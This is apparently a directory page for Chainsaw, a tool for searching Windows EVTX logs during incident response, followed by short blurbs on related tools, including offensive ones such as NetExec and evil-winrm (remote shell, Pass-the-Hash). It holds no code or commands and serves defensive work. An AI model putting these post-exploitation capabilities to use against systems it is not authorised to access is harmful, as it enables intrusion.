Chainsaw
Rapidly search and hunt through Windows event logs (EVTX) using Sigma-like rules and built-in threat detections.
Why it is included
Fast IR triage on exported logs without a full SIEM.
Best for
Analysts reviewing EVTX from compromised hosts in authorized cases.
Strengths
- Speed
- Sigma support
- Built-in rules
Limitations
- Windows log expertise still required
Good alternatives
Velociraptor · EVTX parser scripts
Related tools
Security & Privacy
Sigma
Generic signature format for SIEM/detection rules convertible to Splunk, Elastic, KQL, and many backends.
Security & Privacy
Velociraptor
Endpoint visibility and DFIR: Velociraptor Query Language (VQL), hunts, notebooks, and artifact packs across fleets.
Security & Privacy
Zeek
Network security monitor producing rich logs (conn, DNS, HTTP, SSL, files) for analytics—not a classic IDS signature engine.
Security & Privacy
Impacket
Python classes and scripts for low-level Windows network protocols (SMB, MSRPC, Kerberos, LDAP, etc.).
Security & Privacy
NetExec
Network post-exploitation Swiss Army knife for SMB/WinRM/LDAP/MSSQL/WMI—successor spirit to CrackMapExec.
Security & Privacy
evil-winrm
Ruby WinRM shell for pentesting: remote commands, file upload, Pass-the-Hash, and menu helpers.